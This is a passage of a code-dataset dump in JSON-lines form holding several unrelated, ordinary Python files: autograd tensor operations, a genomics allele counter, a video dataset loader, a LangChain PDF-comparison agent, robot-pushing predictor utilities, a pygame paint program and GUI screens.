(input_grad,)\n \n \nclass TensorSwapaxes(Operation):\n \"\"\"f(inputs) = inputs[0].swapaxes(dim0, dim1)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n dim0: int,\n dim1: int):\n super().__init__(inputs)\n self.dim0 = dim0\n self.dim1 = dim1\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.swapaxes(self.dim0, self.dim1))\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad.swapaxes(self.dim0, self.dim1)\n \n return (input_grad,)\n \n \nclass BatchMatrixMultiply(Operation):\n \"\"\"Multiplies two tensors of shape (A, B, C, ..., M, N) and (A, B, C, ..., N, P).\n\n Returns a tensor of shape (A, B, C, ..., M, P).\"\"\"\n \n def 
__init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 2\n (a, b) = self.inputs\n assert a.shape[:-2] == b.shape[:-2] # Assert first N-2 dimensions match\n\n return tensor.Tensor(a.data @ b.data)\n \n \n def _backward(self,\n output_grad: np.array):\n (a, b) = self.inputs\n input_grad_a = output_grad @ b.data.swapaxes(-1, -2)\n input_grad_b = a.data.swapaxes(-1, -2) @ output_grad\n \n return (input_grad_a, input_grad_b)\n \n \nclass TensorTranspose(Operation):\n \"\"\"f(inputs) = inputs[0].T\"\"\"\n \n def __init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.T)\n \n \n def _backward(self,\n output_grad: np.array):\n return (output_grad.T,)\n \n \nclass TensorMaskedFill(Operation):\n \n def __init__(self,\n inputs: List[Tensor],\n mask: Tensor,\n fill_value: float):\n \"\"\"Returns Tensor with masked values replaced with fill_value.\n \n Parameters\n ----------\n inputs\n Single Tensor.\n mask\n Tensor of 1s and 0s, must be broadcastable with inputs[0].\n 1 to fill with fill_value, 0 to leave as-is.\n fill_value\n Value to fill.\n \n \"\"\"\n super().__init__(inputs)\n if not np.all(np.isclose(mask.data, 0) | np.isclose(mask.data, 1)):\n raise ValueError('mask must be a Tensor with only 0s and 1s.')\n self.broadcasted_mask = np.broadcast_to(mask.data, self.inputs[0].shape)\n self.fill_value = fill_value\n\n \n def _forward(self):\n assert len(self.inputs) == 1\n \n return tensor.Tensor((1 - self.broadcasted_mask) * self.inputs[0].data + self.broadcasted_mask * self.fill_value)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad * (1 - self.broadcasted_mask)\n \n return (input_grad,)\n \n \nclass TensorConcatenation(Operation):\n \"\"\"f(inputs) = np.concatenate(*inputs[0], axis=axis)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: int = 0):\n super().__init__(inputs)\n self.axis = axis\n \n \n def _forward(self):\n return tensor.Tensor(np.concatenate([tensor.data for tensor in self.inputs], axis=self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n input_lengths_along_axis = [i.shape[self.axis] for i in self.inputs]\n indices_or_sections = np.cumsum(input_lengths_along_axis)[:-1]\n\n input_grads = tuple(np.split(output_grad, indices_or_sections, axis=self.axis))\n\n return input_grads\n \n \nclass TensorClone(Operation):\n \"\"\"f(inputs) = inputs[0].copy()\"\"\"\n \n def __init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.copy())\n \n \n def _backward(self,\n output_grad: np.array):\n return (output_grad,)\n \n \nclass TensorRepeatInterleave(Operation):\n \"\"\"f(inputs) = np.repeat(inputs[0], repeats, axis)\"\"\"\n\n def __init__(self,\n inputs: List[Tensor],\n repeats: int,\n axis: int):\n super().__init__(inputs)\n assert type(repeats) is int\n assert axis is None or type(axis) is int\n self.repeats = repeats\n \n if axis is not None:\n dim = len(self.inputs[0].shape)\n axis = (axis + dim) % dim\n self.axis = axis\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.repeat(self.repeats, self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n orig_shape = self.inputs[0].shape\n \n if self.axis is None:\n input_grad = output_grad.reshape(orig_shape + 
(self.repeats,)).sum(axis=-1)\n else:\n shape = (orig_shape[:self.axis]\n + (orig_shape[self.axis], self.repeats)\n + orig_shape[self.axis + 1:])\n\n input_grad = output_grad.reshape(shape).sum(axis=self.axis + 1)\n\n return (input_grad,)\n \n \nclass TensorFlip(Operation):\n \"\"\"f(inputs) = np.flip(inputs[0], axis)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: int = None):\n super().__init__(inputs)\n self.axis = axis\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(np.flip(self.inputs[0].data, axis=self.axis))\n \n \n def _backward(self,\n output_grad: np.array):\n return (np.flip(output_grad, axis=self.axis),)\n\n\nclass TopKOperation(Operation):\n \"\"\"(weights, indices) = topk(inputs[0], k, axis)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n k: int,\n axis: int = -1):\n super().__init__(inputs)\n assert k >= 1\n self.k = k\n self.axis = axis\n self._indices = None # Populated during forward()\n\n \n def _forward(self):\n assert len(self.inputs) == 1\n x = self.inputs[0].data\n x = x.swapaxes(self.axis, -1)\n \n argsort = np.argsort(-x, axis=-1)\n indices = argsort.take(range(self.k), axis=-1)\n \n onehot_bool = np.eye(x.shape[-1]).astype(bool)\n \n weights = []\n for i in range(self.k):\n idx = indices.take(i, axis=-1)\n bool_mask = onehot_bool[idx]\n top_i = x[bool_mask].reshape(idx.shape)\n weights.append(np.expand_dims(top_i, axis=-1))\n \n weights = np.concatenate(weights, axis=-1).swapaxes(-1, self.axis)\n \n self._indices = tensor.Tensor(indices.swapaxes(-1, self.axis)).astype(int)\n \n return tensor.Tensor(weights)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = np.zeros_like(self.inputs[0].data)\n input_grad = np.moveaxis(input_grad, self.axis, -1)\n output_grad = np.moveaxis(output_grad, self.axis, 0)\n indices = np.moveaxis(self._indices.data, self.axis, 0)\n \n onehot_bool = np.eye(input_grad.shape[-1]).astype(bool)\n for i in range(self.k):\n bool_mask = onehot_bool[indices[i]]\n input_grad[bool_mask] = output_grad[i].flatten()\n \n input_grad = np.moveaxis(input_grad, -1, self.axis)\n \n return (input_grad,)\n","repo_name":"johnma2006/candle","sub_path":"candle/operations/tensorops.py","file_name":"tensorops.py","file_ext":"py","file_size_in_byte":15679,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"}
{"seq_id":"70069712564","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage: ./compute_allele_counts.py <vcffile> <parentfile>\n\"\"\"\n\nimport vcf\nimport sys\n\ntry:\n vcffile = sys.argv[1]\n parentfile = sys.argv[2]\nexcept:\n sys.stderr.write(__doc__)\n sys.exit(1)\n\nparents = [line.strip() for line in open(parentfile, \"r\").readlines()]\n\ndef GetEnclReads(sample):\n enclreads = {}\n encl = sample[\"ENCLREADS\"]\n if encl == \"NULL\": return {}\n for item in encl.split(\"|\"):\n al, count = item.split(\",\")\n enclreads[int(al)] = int(count)\n return enclreads\n\ndef FilterCall(sample):\n enclreads = GetEnclReads(sample)\n # Check has at least 10 enclosing reads\n if sum(enclreads.values()) < 10: return True\n # Check each allele supported by >=3 reads\n a1, a2 = [int(item) for item in sample[\"REPCN\"]]\n if enclreads.get(a1, 0) < 3: return True\n if enclreads.get(a2, 0) < 3: return True\n # Check >= 90% of enclosing reads match gt\n badreads = 0\n for a in enclreads.keys():\n if a != a1 and a != a2: badreads += enclreads[a]\n if badreads*1.0/sum(enclreads.values()) > 0.1: return True\n return False\n\nreader = vcf.Reader(open(vcffile, \"rb\"))\nfor record in reader:\n 
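FilterCall above encodes three read-support gates before a genotype is trusted: at least 10 enclosing reads in total, at least 3 reads behind each called allele, and at most 10% of enclosing reads off the called genotype. A worked illustration with a hand-built stand-in for a PyVCF call (FakeSample is hypothetical; real calls expose FORMAT fields through the same [] indexing):

class FakeSample(dict):
    # Hypothetical stand-in that indexes FORMAT fields like a PyVCF call does.
    pass

s = FakeSample({"ENCLREADS": "10,6|12,5|13,1", "REPCN": ["10", "12"]})
# GetEnclReads(s) -> {10: 6, 12: 5, 13: 1}: 12 enclosing reads total (>= 10, pass)
# alleles 10 and 12 are backed by 6 and 5 reads (>= 3 each, pass)
# off-genotype reads = 1, and 1/12 is about 8.3% (<= 10%, pass)
# FilterCall(s) therefore returns False and the call is kept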
allele_counts = {} # allele->count\n for sample in record:\n if not sample.called: continue\n if not sample.sample in parents: continue\n if FilterCall(sample):\n continue\n gt = sample[\"REPCN\"]\n for a in gt:\n a = int(a)\n allele_counts[a] = allele_counts.get(a, 0) + 1\n for a in allele_counts:\n items = [record.CHROM, record.POS, a, allele_counts[a]]\n sys.stdout.write(\"\\t\".join([str(item) for item in items])+\"\\n\")\n","repo_name":"gymreklab/ssc-denovos-paper","sub_path":"scripts/compute_allele_counts.py","file_name":"compute_allele_counts.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"}
{"seq_id":"73712520241","text":"import os\nimport cv2\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset \nfrom skimage.transform import resize\n\ndef get_dataframe(path):\n videos = []\n labels = []\n for folder in os.listdir(path):\n fd = path + folder + '/'\n for video in os.listdir(fd):\n vd = os.path.join(fd, video)\n i = 1 if folder == 'fights' else 0\n videos.append(vd)\n labels.append(i)\n data_dict = {\n 'videos': videos,\n 'labels': labels \n }\n dataframe = pd.DataFrame(data=data_dict)\n return dataframe\n\ndef capture(filename, timesep, rgb, h, w):\n frames = np.zeros((timesep, rgb, h, w), dtype=float)\n i = 0\n vc = cv2.VideoCapture(filename)\n if vc.isOpened():\n rval, frame = vc.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n else:\n rval = False\n frm = resize(frame, (h, w, rgb))\n frm = np.expand_dims(frm, axis=0)\n frm = np.moveaxis(frm, -1, 1)\n if(np.max(frm) > 1):\n frm = frm / 255.0\n frames[i][:] = frm\n i += 1\n while i < timesep:\n rval, frame = vc.read()\n # convert BGR->RGB before resizing so the converted frame is actually used\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frm = resize(frame, (h, w, rgb))\n frm = np.expand_dims(frm, axis=0)\n if(np.max(frm) > 1):\n frm = frm / 255.0\n frm = np.moveaxis(frm, -1, 1)\n # write slot i (not i-1); otherwise the first frame is overwritten\n # and the last slot stays all zeros\n frames[i][:] = frm\n i += 1\n return frames.astype(np.float32)\n\nclass VideoDataset(Dataset):\n def __init__(self, datas, timesep=40, rgb=3, h=160, w=160):\n self.dataloctions = datas\n self.timesep, self.rgb, self.h, self.w = timesep, rgb, h, w\n\n def __len__(self):\n return len(self.dataloctions)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n video = capture(self.dataloctions.iloc[idx, 0], self.timesep, self.rgb, self.h, self.w)\n sample = {'video': torch.from_numpy(video), 'label': torch.from_numpy(np.asarray(np.float32(self.dataloctions.iloc[idx, 1])))}\n return sample","repo_name":"crisvarai/video_class_fight","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"17956416301","text":"from pydantic import BaseModel, Field\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.agents import Tool\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.chains import RetrievalQA\nfrom langchain.agents import initialize_agent\nfrom langchain.agents import AgentType\nimport os\n\n# Create a custom input schema\nclass DocumentInput(BaseModel):\n question: str = Field()\n\n# Set OpenAI API key as environment variable\nos.environ[\"OPENAI_API_KEY\"] = \"YOUR_OPENAI_API_KEY\"\n\n# List of files you want 
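Each VideoDataset sample above is a dict pairing a (timesep, rgb, h, w) float tensor with a scalar label, so it drops straight into a standard DataLoader. An illustrative usage sketch; the data/ path, the fights/ subfolder convention and the batch size are assumptions, not part of the original file:

from torch.utils.data import DataLoader

df = get_dataframe("data/")  # expects data/<folder>/<video>; 'fights' maps to label 1
ds = VideoDataset(df, timesep=40, rgb=3, h=160, w=160)
loader = DataLoader(ds, batch_size=4, shuffle=True)
for batch in loader:
    # (batch, frames, channels, height, width)
    assert batch["video"].shape == (4, 40, 3, 160, 160)
    break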
to compare\nfiles = [\n {\n \"name\": \"Volkswagen-earnings-Q1-2023\",\n \"path\": \"files/Volkswagen-Q1_2023.pdf\"\n },\n {\n \"name\": \"tesla-earning-Q1-2023\",\n \"path\": \"files/TSLA-Q1-2023-Update.pdf\"\n },\n]\n\n# Initialize a list of tools\ntools = []\n\n# Initialize the LLM\nllm = ChatOpenAI(temperature=0, model=\"gpt-3.5-turbo-0613\")\n\n# Loop over the files\nfor file in files:\n # Load the documents\n loader = PyPDFLoader(file[\"path\"])\n pages = loader.load_and_split()\n\n # Split the documents into chunks\n text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n docs = text_splitter.split_documents(pages)\n print(f\"Loaded {len(docs)} documents from {file['name']}\")\n\n # Vectorize the documents and create a retriever\n embeddings = OpenAIEmbeddings()\n retriever = FAISS.from_documents(docs, embeddings).as_retriever()\n \n # Wrap retrievers in a Tool\n tools.append(\n Tool(\n args_schema=DocumentInput,\n name=file[\"name\"], \n description=f\"useful when you want to answer questions about {file['name']}\",\n func=RetrievalQA.from_chain_type(llm=llm, retriever=retriever)\n )\n )\n\n# Initialize LLM for the agent\nllm = ChatOpenAI(\n temperature=0,\n model=\"gpt-3.5-turbo-0613\", \n)\n\n# Initialize the agent\nagent = initialize_agent(\n agent=AgentType.OPENAI_FUNCTIONS,\n tools=tools,\n llm=llm,\n verbose=True,\n)\n\n# Initialize the question variable\nquestion = \"\"\n\n# Run a loop to ask questions\nwhile True and question != \"exit\":\n question = input(\"Ask a question or write exit to quit: \")\n if question == \"exit\":\n break\n answer = agent({\"input\": question})\n print(answer[\"output\"])\n print(\"------\")","repo_name":"JorisdeJong123/7-Days-of-LangChain","sub_path":"day_6/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"75"} +{"seq_id":"8875000510","text":"## Utility functions to help main.py\n\nfrom push_net_model import *\n\nimport numpy as np\nimport os\nimport time\nimport logging\nfrom colorama import Fore\n\nimport config as args\nfrom img_utils import * \n\n''' Dimension of input image'''\nW = args.image_resolution[\"width\"]#128.0 ##!!!! 
Important to make it a float to prevent integer division producing zeros\nH = args.image_resolution[\"height\"]#106.0\n\n''' Mode of Goal Configuration Specification'''\n#MODE = args.mode[\"position\"] ## uncomment this line if you only care how to re-position an object\n#MODE = args.mode[\"rotation\"] ## uncomment this line if you only care how to re-orient an object\nMODE = args.mode[\"reconfigure\"]## uncomment this line if care both re-position and re-orient an object\n\n''' Method for comparison '''\nMETHOD = args.method[\"with_COM\"]#'simcom' ## Original Push-Net\n#METHOD = args.method[\"without_COM\"]#'sim' ## Push-Net without estimating COM\n#METHOD = args.method[\"without_memory\"]#'nomem' ## Push-Net without LSTM\n\n''' visualization options '''\nCURR_VIS = True # display current image\nNEXT_VIS = True # display target image\nSAMPLE_VIS = False # display all sampled actions\nBEST_VIS = True # display the best action\nSAMPLE_ACTIONS = True\nNUM_ACTION_EXECUTE = 5\n\nlogging.basicConfig(format='%(asctime)s %(message)s',filename='pushnet.log', filemode='w', level=logging.INFO)\nprint('\\033[1m' + f\"Input image size {int(W)} x {int(H)}\" + '\\033[0m')\nprint('\\033[1m' + \"Input image size %.2f MB\"%1.1 + '\\033[0m')\n\n\ndef to_var(x, volatile=False):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x, volatile=volatile)\n\n'''deep neural network predictor'''\nclass Predictor:\n def __init__(self):\n self.bs = args.batch_size\n model_path = args.model_path#'./model'\n best_model_name = args.arch[METHOD] + '.pth.tar'\n self.model_path = os.path.join(model_path, best_model_name)\n self.model = self.build_model()\n #calculate time to initialize the model\n start = time.time()\n self.load_model()\n end = time.time()\n time_elapsed = float(end - start)\n logging.info(\"Time taken to initialize the model: %.2f ms\" % (time_elapsed * 1000))\n\n def load_model(self):\n try:\n\n self.model.load_state_dict(torch.load(self.model_path)['state_dict'])\n if torch.cuda.is_available():\n self.model.cuda()\n self.model.eval()\n except FileNotFoundError:\n print(Fore.RED+'\\033[1m' +\"Model file not found. Check the path variable and filename. 
EXITING.....\" + \"\\033[0m\")\n exit()\n\n def build_model(self):\n if METHOD == 'simcom':\n return COM_net_sim(self.bs)\n elif METHOD == 'sim':\n return COM_net_sim_only(self.bs)\n elif METHOD == 'nomem':\n return COM_net_nomem(self.bs)\n\n def reset_model(self):\n ''' reset the hidden state of LSTM before pushing another new object '''\n self.model.hidden = self.model.init_hidden()\n\n def update(self, start, end, img_curr, img_goal):\n ''' update LSTM states after an action has been executed'''\n\n bs = self.bs\n A1 = []\n I1 = []\n Ig = []\n for i in range(bs):\n a1 = [[start[0]/W, start[1]/H, end[0]/W, end[1]/H]]\n i1 = [img_curr]\n ig = [img_goal]\n A1.append(a1)\n I1.append(i1)\n Ig.append(ig)\n\n A1 = torch.from_numpy(np.array(A1)).float()\n I1 = torch.from_numpy(np.array(I1)).float().div(255)\n Ig = torch.from_numpy(np.array(Ig)).float().div(255)\n\n A1 = to_var(A1)\n I1 = to_var(I1)\n Ig = to_var(Ig)\n\n if METHOD == 'simcom':\n sim_out, com_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n elif METHOD == 'sim':\n sim_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n elif METHOD == 'nomem':\n sim_out = self.model(A1, I1, A1, Ig, [1 for i in range(bs)], bs)\n\n def evaluate_action(self, img_curr, img_goal, actions):\n ''' calculate the similarity score of actions '''\n bs = self.bs\n A1 = []\n I1 = []\n Ig = []\n\n for i in range(bs):\n a1 = [[actions[4*i]/W, actions[4*i+1]/H, actions[4*i+2]/W, actions[4*i+3]/H]]\n i1 = [img_curr]\n ig = [img_goal]\n A1.append(a1)\n I1.append(i1)\n Ig.append(ig)\n\n A1 = torch.from_numpy(np.array(A1)).float()\n I1 = torch.from_numpy(np.array(I1)).float().div(255)\n Ig = torch.from_numpy(np.array(Ig)).float().div(255)\n\n A1 = to_var(A1)\n I1 = to_var(I1)\n Ig = to_var(Ig)\n\n sim_out = None\n com_out = None\n\n if METHOD == 'simcom':\n sim_out, com_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n elif METHOD == 'sim':\n sim_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n elif METHOD == 'nomem':\n sim_out = self.model(A1, I1, A1, Ig, [1 for j in range(bs)], bs)\n\n sim_np = sim_out.data.cpu().data.numpy()\n\n if MODE == 'wxy':\n sim_sum = np.sum(sim_np, 1) # measure (w ,x, y)\n elif MODE == 'xy':\n sim_sum = np.sum(sim_np[:,1:], 1) # measure (x, y)\n else:\n sim_sum = sim_np[:, 0] # measure (w)\n\n action_value = []\n for ii in range(len(sim_sum)):\n s = [actions[4 * ii], actions[4 * ii + 1]]\n e = [actions[4 * ii + 2], actions[4 * ii + 3]]\n action_value.append([[s, e], sim_sum[ii]])\n\n return action_value\n\n","repo_name":"MlLearnerAkash/Push-Net","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38569991283","text":"from ex115.lib.interface import *\nfrom ex115.lib.arquivo import *\nfrom time import sleep\n\narq = 'cursoemvideo.txt'\n\n#if arquivoExiste(arq):\n# print('Arquivo encontrado com sucesso')\n#else:\n# print('Arquivo não encontrado')\n# criarArquivo(arq)\n\nif not arquivoExiste(arq):\n criarArquivo(arq)\n\nwhile True:\n resposta = menu(['Listar Pessoas Cadastradas', 'Cadastrar Nova Pessoa', 'Sair'])\n if resposta == 1: # Opção de listar conteúdo de um arquivo\n lerArquivo(arq)\n elif resposta == 2: # Opção para adicionar dados\n cabeçalho('NOVO CADASTRO')\n nome = str(input('Nome: '))\n idade = leiaInt('Idade: ')\n cadastrar(arq, nome, idade)\n elif resposta == 3:\n cabeçalho('\\033[36mSaindo do Sistema! 
Até Logo!\\033[m')\n break\n else:\n print('\\033[31mERRO! Digite uma opção válida!\\033[m')\n\n\n\n","repo_name":"EvandroMauricioSI/Aprendendo-Python","sub_path":"CursoEmVídeo/CeV-Python3 Mundo3 Desafios/ex115/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33711194924","text":"from magma import *\nfrom magma.passes.clock import drive_undriven_other_clock_types_in_inst\nfrom mantle import Mux\nfrom .register import _RegisterName, Register\n\n__all__ = ['DefinePIPO', 'PIPO']\n\ndef DefinePIPO(n, init=0, has_ce=False, has_reset=False):\n \"\"\"\n Generate Parallel-In, Parallel-Out shift register.\n\n SI : In(Bit), PI : In(Bits(n)), LOAD : Bit, O : Out(Bits(n))\n \"\"\"\n\n T = Bits[ n ]\n class _PIPO(Circuit):\n name = _RegisterName('PIPO', n, init, has_ce, has_reset)\n IO = ['SI', In(Bit), 'PI', In(T), 'LOAD', In(Bit),\n 'O', Out(T)] + ClockInterface(has_ce,has_reset)\n @classmethod\n def definition(pipo):\n def mux2(y):\n return curry(Mux(2), prefix='I')\n\n mux = braid(col(mux2, n), forkargs=['S'])\n reg = Register(n, init=init, has_ce=has_ce, has_reset=has_reset)\n\n #si = array([pipo.SI] + [reg.O[i] for i in range(n-1)])\n si = concat(array(pipo.SI),reg.O[0:n-1])\n mux(si, pipo.PI, pipo.LOAD)\n reg(mux)\n wire(reg.O, pipo.O)\n drive_undriven_other_clock_types_in_inst(pipo, reg)\n\n return _PIPO\n\ndef PIPO(n, init=0, has_ce=False, has_reset=False, **kwargs):\n return DefinePIPO(n, init, has_ce, has_reset)(**kwargs)\n\n","repo_name":"bbPeng98/DSE-framework-of-PRAD","sub_path":"MetaMapper/MetaMapper/src/mantle/mantle/common/pipo.py","file_name":"pipo.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"314896115","text":"import pygame\nimport sys\nfrom pygame.locals import *\nimport random\nimport math\nimport datetime\n\n# いろをいくつか定義\ncolors = ((0, 0, 0), #黒\n (255, 0, 0), #赤\n (0, 255, 0), #みどり\n (0, 0, 255), #青\n (255, 255, 255) #白\n )\n\n#最初のペンキのいろ\ncolor = 0\n\n#一個の箱の大きさ(ピクセル)\nblock_size = 20\n#箱の数(一辺) \nmatrix_size = 30\n\n# 最初は全部白にする (白は4)\nmtrx = [[4] * matrix_size for i in range(matrix_size)]\n\n# 箱を全部書いていく\ndef draw():\n for i in range(matrix_size):\n for j in range(matrix_size):\n val = mtrx[j][i]\n pygame.draw.rect(screen,colors[val],[i * block_size, j * block_size, block_size,block_size], 0)\n\npygame.init()\nscreen = pygame.display.set_mode([block_size * matrix_size, block_size * matrix_size])\npygame.display.set_caption(\"Miura Paint\")\n \ndone = False\nclock = pygame.time.Clock()\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n #イベント処理\n had_event = False\n for event in pygame.event.get():\n had_event = True\n\n #画面を閉じるボタン\n if event.type == QUIT:\n pygame.quit()\n \n #キーが押されたとき\n if event.type == KEYDOWN:\n #終了\n if event.key == K_q or event.key == K_ESCAPE:\n pygame.quit()\n #色の切り替え 1 ~ 5 までのの色\n if event.key == K_1:\n color = 0\n if event.key == K_2:\n color = 1\n if event.key == K_3:\n color = 2\n if event.key == K_4:\n color = 3\n if event.key == K_5:\n color = 4\n # s で保存\n if event.key == K_s:\n dt = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n filename = \"screenshot_\" + dt + \".jpg\"\n pygame.image.save(screen ,filename)\n print(filename, \"で保存しました。\") \n\n #クリックで描く\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n col = math.floor(pos[0] / block_size)\n row = 
math.floor(pos[1] / block_size)\n mtrx[row][col] = color\n\n #マウスののボタンを押した状態でマウスを動かして、描く\n if event.type == pygame.MOUSEMOTION:\n if pygame.mouse.get_pressed()[0]: \n pos = pygame.mouse.get_pos()\n col = math.floor(pos[0] / block_size)\n row = math.floor(pos[1] / block_size)\n mtrx[row][col] = color\n \n draw()\n pygame.display.flip()\n clock.tick(20) \npygame.quit()\n","repo_name":"hypotize/mcc1","sub_path":"code/python/paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72719991921","text":"from typing import Optional\n\nfrom PyQt6.QtCore import QModelIndex, Qt\nfrom PyQt6.QtWidgets import QFrame, QHBoxLayout, QScrollArea, QSizePolicy, QVBoxLayout\nfrom PyQt6.QtWidgets import QWidget\n\nfrom ...screen import QScreen\nfrom ..solfilmdetailscreen import QSolFilmDetailScreen\nfrom hayai.features.sol.viewmodels import QSolHomeViewModel\nfrom hayai.features.provider.delegates.filmdelegate import QFilmDelegate\nfrom hayai.features.widgets.rowview import QRowView\n\n\nclass QSolHomeScreen(QScreen):\n\n def __init__(self, parent: Optional[QWidget] = None ) -> None:\n super().__init__(parent=parent)\n self._homeViewModel: QSolHomeViewModel = QSolHomeViewModel(self)\n\n scrollAreaFrame: QFrame = QFrame()\n\n scrollArea = QScrollArea()\n scrollArea.setObjectName(\"scroll-area\")\n scrollArea.setSizePolicy(QSizePolicy.Policy.MinimumExpanding,QSizePolicy.Policy.MinimumExpanding)\n \n scrollArea.setWidget(scrollAreaFrame)\n scrollArea.horizontalScrollBar().setEnabled(False)\n scrollArea.verticalScrollBar().setEnabled(True)\n scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded)\n scrollArea.setWidgetResizable(True)\n scrollArea.setContentsMargins(0,0,0,0)\n\n trendingMoviesRow: QRowView = QRowView(\"trending movies\",self._homeViewModel.trendingMovies,QFilmDelegate())\n trendingShowsRow: QRowView = QRowView(\"trending shows\",self._homeViewModel.trendingShows,QFilmDelegate())\n latestMoviesRow: QRowView = QRowView(\"latest movies\",self._homeViewModel.latestMovies,QFilmDelegate())\n latestShowsRow: QRowView = QRowView(\"latest shows\",self._homeViewModel.latestShows,QFilmDelegate())\n comingSoonRow: QRowView = QRowView(\"coming soon\",self._homeViewModel.comingSoon,QFilmDelegate())\n\n self.started.connect(self._homeViewModel.loadHome)\n trendingMoviesRow.itemClicked.connect(self.onFilmClicked)\n trendingShowsRow.itemClicked.connect(self.onFilmClicked)\n latestMoviesRow.itemClicked.connect(self.onFilmClicked)\n latestShowsRow.itemClicked.connect(self.onFilmClicked)\n comingSoonRow.itemClicked.connect(self.onFilmClicked)\n\n scrollAreaFrameLayout: QVBoxLayout = QVBoxLayout()\n scrollAreaFrameLayout.addWidget(trendingMoviesRow)\n scrollAreaFrameLayout.addWidget(trendingShowsRow)\n scrollAreaFrameLayout.addWidget(latestMoviesRow)\n scrollAreaFrameLayout.addWidget(latestShowsRow)\n scrollAreaFrameLayout.addWidget(comingSoonRow)\n scrollAreaFrameLayout.setContentsMargins(0,0,0,0)\n scrollAreaFrameLayout.setAlignment(Qt.AlignmentFlag.AlignTop)\n scrollAreaFrameLayout.setSpacing(0)\n scrollAreaFrame.setLayout(scrollAreaFrameLayout)\n\n homeLayout: QHBoxLayout = QHBoxLayout()\n homeLayout.addWidget(scrollArea)\n homeLayout.setContentsMargins(0,0,0,0)\n homeLayout.setSpacing(0)\n self.setLayout(homeLayout)\n\n self.setSizePolicy(QSizePolicy.Policy.Expanding,QSizePolicy.Policy.Minimum)\n self.title = \"Home\"\n\n def onFilmClicked(self,index: QModelIndex):\n 
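The click handling above maps pixel coordinates to grid cells with one floor division per axis. A worked example with illustrative numbers: with block_size = 20, a click at pos = (131, 47) lands in column 6 and row 2, so mtrx[2][6] receives the current color.

import math

block_size = 20
pos = (131, 47)                        # pixel coordinates of the click
col = math.floor(pos[0] / block_size)  # 131 // 20 -> 6
row = math.floor(pos[1] / block_size)  # 47 // 20 -> 2
assert (row, col) == (2, 6)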
filmUrl: Optional[str] = index.siblingAtColumn(1).data()\n if filmUrl is not None and self.navigation is not None:\n screen: QScreen = QSolFilmDetailScreen(filmUrl)\n self.navigation.push(screen)\n\n","repo_name":"crypto-0/hayai","sub_path":"hayai/screens/solscreen/solhomescreen/solhomescreen.py","file_name":"solhomescreen.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
